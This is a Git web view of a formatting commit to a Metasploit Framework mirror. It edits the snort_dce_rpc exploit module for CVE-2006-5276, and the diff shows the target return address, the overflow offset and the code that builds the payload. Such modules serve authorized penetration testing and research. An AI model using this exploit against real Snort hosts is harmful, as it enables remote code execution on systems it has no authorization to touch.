infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor formatting changes, tabs etc. and comments for clarity

unstable
Carsten Maartmann-Moe 2012-04-08 15:45:23 -04:00
parent b2e0acd92a
commit 89c1894e07
1 changed files with 22 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
modules/exploits/windows/ids/snort_dce_rpc.rb
View File

@ -38,33 +38,37 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
'Carsten Maartmann-Moe <carsten@carmaa.com>' 'Carsten Maartmann-Moe <carsten@carmaa.com>'
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',
'Platform' => 'win', 'Platform' => 'win',
'References' => 'References' =>
[ [
[ 'OSVDB', '67988' ], [ 'OSVDB', '67988' ],
[ 'CVE', 'CVE-2006-5276' ], [ 'CVE', 'CVE-2006-5276' ],
[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py'] [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
], ],
'Privileged' => true, 'DefaultOptions' =>
'Payload' =>
{ {
'Space' => 500, 'EXITFUNC' => 'thread',
'BadChars' => "\x00",
'DisableNops' => true,
}, },
'Targets' => 'Payload' =>
{
'Space' => 390,
'BadChars' => "\x00",
'DisableNops' => true,
},
'Targets' =>
[ [
[ 'Windows Universal', [ 'Windows Universal',
{ {
'Ret' => 0x00407c01, # JMP ESP snort.exe 'Ret' => 0x00407c01, # JMP ESP snort.exe
'Offset' => 0x0121 # The number of bytes before overwrite 'Offset' => 289 # The number of bytes before overwrite
} }
], ],
], ],
'DisclosureDate' => 'Feb 19 2007', 'Privileged' => true,
'DefaultTarget' => 0)) 'DisclosureDate' => 'Feb 19 2007',
'DefaultTarget' => 0))
register_options( register_options(
[ [
@ -87,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
capture_sendto(p, rhost) capture_sendto(p, rhost)
# Cleanup
handler handler
end end
@ -145,14 +148,14 @@ class Metasploit3 < Msf::Exploit::Remote
sploit = make_nops(10) sploit = make_nops(10)
sploit << payload.encoded sploit << payload.encoded
# Padding (need to bad the payload with one byte to pass size check) # Padding (to pass size check)
sploit << make_nops(1) sploit << make_nops(1)
# The size to be included the Write AndX Request #2, including sploit payload # The size to be included in Write AndX Request #2, including sploit payload
size = [(sploit.size() + target['Offset'])].pack('v') requestsize = [(sploit.size() + target['Offset'])].pack('v')
# Assemble the parts into one package # Assemble the parts into one package
p.payload = header << size << tail << eip << sploit p.payload = header << requestsize << tail << eip << sploit
p.recalc p.recalc
p p